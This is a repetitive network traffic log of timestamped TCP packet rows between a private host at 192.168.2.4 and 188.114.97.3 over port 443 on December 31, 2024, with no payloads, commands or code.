Dec 31, 2024 08:57:13.198138952 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.201188087 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.201267004 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.203408957 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.218615055 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.218849897 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.218856096 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.218997002 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.219849110 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.219954967 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.222209930 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.222455025 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.230530977 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.230696917 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.247740984 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.247833967 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.247860909 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.247863054 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.247870922 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.247884035 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.247925997 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.248064041 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.248126984 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.248157978 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.248161077 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.248219013 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.248260021 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.248294115 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.248342037 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.248354912 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.248358965 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.248392105 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.248394966 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.248394966 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.248455048 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.248455048 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.248461008 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.254754066 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.254858971 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.254864931 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.262646914 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.262777090 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.262782097 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.263999939 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.264414072 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.264425039 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.264645100 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.272140026 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.272192001 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.272229910 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.272234917 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.272527933 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.276886940 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.277812958 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.282138109 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.282354116 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.282366991 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.282552004 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.282798052 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.282959938 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.282965899 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.283083916 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.283660889 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.283705950 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.283747911 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.283754110 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.283873081 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.284286022 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.284351110 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.284416914 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.284471989 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.285206079 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.285284042 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.285830021 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.285862923 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.285890102 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.285892963 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.285907030 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.285933018 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.285996914 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.286000967 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.287853956 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.287946939 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.287951946 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.290664911 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.290791035 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.290796995 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.294027090 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.294075012 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.294104099 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.294118881 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.294125080 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.294142008 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.294154882 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.320446968 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.320523024 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.320528984 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.321997881 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.322096109 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.322102070 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.322721958 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.322936058 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.322942019 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.322984934 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.323024988 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.323276043 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.323282957 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.326832056 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.326909065 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.326953888 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.326987028 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.326992035 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.327020884 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.327713966 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.327764988 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.327792883 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.327795982 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.327825069 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.327934027 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.327966928 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.327971935 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.328031063 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.328068972 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.328104019 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.328109026 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.328162909 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.328454018 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.329601049 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.329652071 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.329679966 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.329687119 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.329835892 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.334271908 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.334393024 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.341259956 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.341331005 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.341331005 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.349986076 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.350038052 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.351075888 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.351106882 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.351150990 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.351155043 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.351197004 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.351322889 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.351329088 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.351463079 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.355484009 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.355562925 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.355690002 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.355695009 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.355863094 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.369971037 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.370007038 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.370029926 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.370034933 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.370058060 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.370153904 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.370160103 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.370256901 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.377278090 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.377388954 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.377393007 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.377397060 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.377466917 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.377588987 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.377667904 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.377672911 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.377702951 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.377747059 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.377753973 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.377867937 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.377901077 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.378046036 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.378191948 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.378257036 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.378285885 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.378318071 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.378348112 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.378350973 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.378365993 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.378518105 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.378524065 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.378614902 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.378628969 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.378721952 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.378741980 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.378746986 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.378784895 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.378910065 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.378974915 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.379034996 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.379039049 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.379076958 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.379123926 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.379129887 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.379256010 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.380796909 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.380832911 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.380893946 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.380897045 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.380984068 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.380987883 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.380991936 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.381097078 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.409473896 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.409524918 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.409557104 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.409562111 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.409615040 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.409646988 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.409674883 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.409682035 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.409692049 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.409753084 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.413480043 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.413530111 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.413610935 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.413616896 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.413696051 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.413712978 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.413728952 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.413804054 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.413841009 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.414040089 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.414117098 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.414118052 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.414124966 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.414175987 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.414300919 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.414407015 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.414446115 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.414449930 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.414508104 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.414647102 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.414701939 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.414726019 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.414731979 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.414827108 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.421009064 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.421040058 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.421108961 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.421113014 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.421175003 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.421192884 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.421211958 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.421216011 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.421235085 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.428033113 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.428169012 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.428174019 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.428221941 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.428250074 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.428277016 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.428281069 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.428316116 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.428370953 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.437848091 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.437948942 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.437963963 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.437968969 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.438040972 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.438087940 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.438231945 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.442276955 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.442352057 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.442368984 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.442375898 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.442696095 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.464045048 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.464104891 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.464148045 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.464253902 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.464273930 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.464277029 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.464306116 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.464349031 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.464349031 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.464356899 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.464411020 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.464463949 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.464471102 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.464579105 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.464709044 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.464735031 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.464740992 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.464780092 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.464960098 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.465004921 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.465054035 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.465056896 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.465069056 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.465143919 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.465166092 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.465173006 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.465262890 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.465425968 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.465478897 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.465542078 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.465544939 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.465610027 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.465615034 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.465646029 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.465677023 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.465679884 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.465775967 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.465795994 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.465934992 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.465938091 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.465945959 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.466028929 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.500498056 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.500514984 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.500606060 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.500617981 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.500657082 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.500754118 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.500754118 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.500758886 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.500896931 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.500910997 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.500915051 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.500951052 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.501024961 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.501094103 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.501097918 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.501172066 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.501183033 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.501187086 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.501303911 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.501307011 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.501313925 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.501400948 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.501418114 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.501458883 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.507812977 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.507942915 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.507958889 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.507963896 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.508021116 CET	49735	443	192.168.2.4	188.114.97.3
